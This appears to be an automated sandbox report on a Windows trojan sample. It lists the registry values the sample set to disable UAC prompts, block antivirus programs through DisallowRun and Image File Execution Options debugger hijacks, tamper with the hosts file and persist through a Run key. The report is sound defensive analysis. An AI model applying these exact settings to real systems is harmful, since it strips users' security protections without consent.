07a6b264f4c2b652f76a7bc65b19d4a4590bf38ed7bc5d8befdc014040210719

Analysis

max time kernel
149s
max time network
149s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
21-09-2024 00:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Size

2.6MB
MD5

eeb864d76675ad5171e9c9b0373b0620
SHA1

0a09d65356f41e62f25d6709b619d293096c3afd
SHA256

07a6b264f4c2b652f76a7bc65b19d4a4590bf38ed7bc5d8befdc014040210719
SHA512

6e298c0aee1c02d2a0ca8b384a34400a12a9505fcc4138dc143ff6f0e1723e7a10a7ba2121fdf1157e461c927b7330618ab652defbf7cfe82bf406eff6cf4939
SSDEEP

49152:7E+stNddv/eA7F/DAw/Ci1SODfOl0XcVxY/Sd58p9+fFd:7EVtNdh/eA7F8QcODAEcVCa58H+f7

Score

10^/10

bootkit discovery evasion persistence privilege_escalation spyware stealer trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 6 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "2"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "2"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Blocks application from running via registry modification 18 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "avscan.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "avgscanx.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "avgnt.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "avcenter.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "avgfrw.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "avgemc.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "avgcmgr.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\0 = "msseces.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "avgtray.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "avgchsvx.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "egui.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "avgui.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "ekrn.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "avgcfgex.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "avgwdsvc.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "MSASCui.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Drops file in Drivers directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\host_new	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File created	C:\Windows\system32\drivers\etc\host_new	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File created	C:\Windows\System32\drivers\etc\hosts	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IEShow.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpfnt206.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dpfsetup.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jedi.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\webdav.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atcon.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpm.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kerio-wrl-421-en-win.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msvxd.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashPopWz.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\normist.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qh.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsav.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nssys32.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bundle.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netutils.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Identity.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fact.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OAReg.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\htlog.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsstat.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wrctrl.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avmailc.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hxiul.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\moolive.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tsadbot.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navapsvc.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\npfmessenger.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rtvscan.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\save.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgiproxy.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cwnb181.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perswf.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\savenow.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SecurityFighter.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avciman.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmgrdian.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\w9x.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zonealarm.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msiexec16.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\webscanx.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bidserver.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tds-3.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vet32.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bspatch.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsav530wtbyb.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luspt.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ntrtscan.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\secureveteran.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cleanpc.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icload95.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wrctrl.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windows Police Pro.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jdbgmrg.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashSimpl.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\optimize.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\titaninxp.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tvmd.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\prizesurfer.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wkufind.exe	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SaveArmor.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OAReg.exe\Debugger = "svchost.exe"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Loads dropped DLL 4 IoCs

pid	Process
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
2088	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2088-3-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-8-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-6-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-7-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-247-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-250-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-249-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-248-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-258-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-255-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-265-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-266-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-267-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-320-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-329-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-303-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-324-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-352-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-359-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-382-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-381-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-360-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-387-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-385-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-400-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-401-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-427-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-449-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-450-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-451-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-453-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-455-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-457-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-456-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-458-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-489-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-490-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-491-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-492-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-523-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-524-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-525-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-635-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-637-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-645-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-647-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-646-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-658-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-656-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-649-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-671-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-670-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-660-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-720-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-722-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-721-0x0000000013140000-0x0000000013746000-memory.dmp	upx
behavioral1/memory/2088-723-0x0000000013140000-0x0000000013746000-memory.dmp	upx

Unexpected DNS network traffic destination 36 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.222.222

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key deleted	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Internet Security Essentials = "\"C:\\ProgramData\\9816f\\ISba6.exe\" /s /d"	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Eset\Nod\	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	eeb864d76675ad5171e9c9b0373b0620_JaffaCakes118.exe
